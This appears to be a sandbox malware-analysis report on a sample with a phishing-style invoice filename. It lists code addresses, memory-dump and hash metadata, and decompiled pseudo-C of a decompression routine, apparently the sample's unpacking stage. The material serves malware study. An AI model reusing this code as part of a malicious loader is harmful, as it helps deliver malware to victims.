0x00406777
0x0040677a
0x00000000
0x00000000
0x00406824
0x00406828
0x00406846
0x00406846
0x00406846
0x0040684d
0x00406854
0x0040685b
0x0040685b
0x00000000
0x0040685b
0x0040682a
0x0040682d
0x00406830
0x00406833
0x0040683a
0x0040677e
0x0040677e
0x00406781
0x00000000
0x00000000
0x00406915
0x00406918
0x00406819
0x00000000
0x00000000
0x0040654f
0x00406551
0x00406558
0x00406559
0x0040655b
0x0040655e
0x00000000
0x00000000
0x00406566
0x00406569
0x0040656c
0x0040656e
0x00406570
0x00406570
0x00406571
0x00406574
0x0040657b
0x0040657e
0x0040658c
0x00000000
0x00000000
0x00406862
0x00406862
0x00406865
0x0040686c
0x00000000
0x00000000
0x00406871
0x00406871
0x00406875
0x004069ad
0x00000000
0x004069ad
0x0040687b
0x0040687e
0x00406881
0x00406885
0x00406888
0x0040688e
0x00406890
0x00406890
0x00406890
0x00406893
0x00406896
0x00406896
0x00406896
0x00406896
0x00406899
0x00406899
0x0040689d
0x004068fd
0x00406900
0x00406905
0x00406906
0x00406908
0x0040690a
0x0040690d
0x00406819
0x00406819
0x00000000
0x0040681f
0x00406819
0x0040689f
0x004068a5
0x004068a8
0x004068ab
0x004068ae
0x004068b1
0x004068b4
0x004068b7
0x004068ba
0x004068bd
0x004068c0
0x004068d9
0x004068dc
0x004068df
0x004068e2
0x004068e6
0x004068e8
0x004068e8
0x004068e9
0x004068ec
0x004068c2
0x004068c2
0x004068ca
0x004068cf
0x004068d1
0x004068d4
0x004068d4
0x004068ef
0x004068f6
0x00000000
0x004068f8
0x00000000
0x004068f8
0x00000000
0x00406594
0x00406597
0x004065cd
0x004066fd
0x004066fd
0x004066fd
0x004066fd
0x00406700
0x00406700
0x00406703
0x00406705
0x0040698f
0x00000000
0x0040698f
0x0040670b
0x0040670e
0x00000000
0x00000000
0x00406714
0x00406718
0x0040671b
0x0040671b
0x0040671b
0x00000000
0x0040671b
0x00406599
0x0040659b
0x0040659d
0x0040659f
0x004065a2
0x004065a3
0x004065a5
0x004065a7
0x004065aa
0x004065ad
0x004065c3
0x004065c8
0x00406600
0x00406600
0x00406604
0x00406630
0x00406632
0x00406639
0x0040663c
0x0040663f
0x0040663f
0x00406644
0x00406644
0x00406646
0x00406649
0x00406650
0x00406653
0x00406680
0x00406680
0x00406683
0x00406686
0x004066fa
0x004066fa
0x004066fa
0x00000000
0x004066fa
0x00406688
0x0040668e
0x00406691
0x00406694
0x00406697
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066c2
0x004066c4
0x004066c7
0x004066c8
0x004066cb
0x004066cd
0x004066d0
0x004066d2
0x004066d4
0x004066d7
0x004066d9
0x004066dc
0x004066e0
0x004066e2
0x004066e2
0x004066e3
0x004066e6
0x004066e9
0x004066ab
0x004066ab
0x004066b3
0x004066b8
0x004066ba
0x004066bd
0x004066bd
0x004066ec
0x004066f3
0x0040667d
0x0040667d
0x0040667d
0x0040667d
0x00000000
0x004066f5
0x00000000
0x004066f5
0x004066f3
0x00406606
0x00406609
0x0040660b
0x0040660e
0x00406611
0x00406614
0x00406616
0x00406619
0x0040661c
0x0040661c
0x0040661f
0x0040661f
0x00406622
0x00406629
0x004065fd
0x004065fd
0x004065fd
0x004065fd
0x00000000
0x0040662b
0x00000000
0x0040662b
0x00406629
0x004065af
0x004065b2
0x004065b4
0x004065b7
0x00000000
0x00000000
0x00406316
0x00406316
0x0040631a
0x0040695f
0x00000000
0x0040695f
0x00406320
0x00406323
0x00406326
0x00406329
0x0040632c
0x0040632f
0x00406332
0x00406334
0x00406337
0x0040633a
0x0040633d
0x0040633f
0x0040633f
0x0040633f
0x00000000
0x00000000
0x004064a1
0x004064a1
0x004064a5
0x0040696b
0x00000000
0x0040696b
0x004064ab
0x004064ae
0x004064b1
0x004064b4
0x004064b6
0x004064b6
0x004064b6
0x004064b9
0x004064bc
0x004064bf
0x004064c2
0x004064c5
0x004064c8
0x004064c9
0x004064cb
0x004064cb
0x004064cb
0x004064ce
0x004064d1
0x004064d4
0x004064d7
0x004064d7
0x004064d7
0x004064da
0x004064dc
0x004064dc
0x00000000
0x00000000
0x0040671e
0x0040671e
0x0040671e
0x00406722
0x00000000
0x00000000
0x00406728
0x0040672b
0x0040672e
0x00406731
0x00406733
0x00406733
0x00406733
0x00406736
0x00406739
0x0040673c
0x0040673f
0x00406742
0x00406745
0x00406746
0x00406748
0x00406748
0x00406748
0x0040674b
0x0040674e
0x00406751
0x00406754
0x00406757
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00406762
0x004064df
0x004064df
0x00000000
0x004064df
0x00406760
0x00406995
0x00000000
0x00000000
0x00405fc4
0x004069cc
0x004069cc
0x00000000
0x004069cc
0x00406819
0x004067a0
0x0040679d
0x00000000
0x004063d4

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
Instruction ID: 235c9a1f152390887c8e3346b3cf8cf745e7d176c25095dba4735a56a8f4339d
Opcode Fuzzy Hash: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
Instruction Fuzzy Hash: 80714371D00229CBDF28CFA8C8447ADBBF1FB48305F15806AD846BB281D7395A96DF54

Uniqueness

Uniqueness Score: -1.00%

Function 004064EE, Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004064EE() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
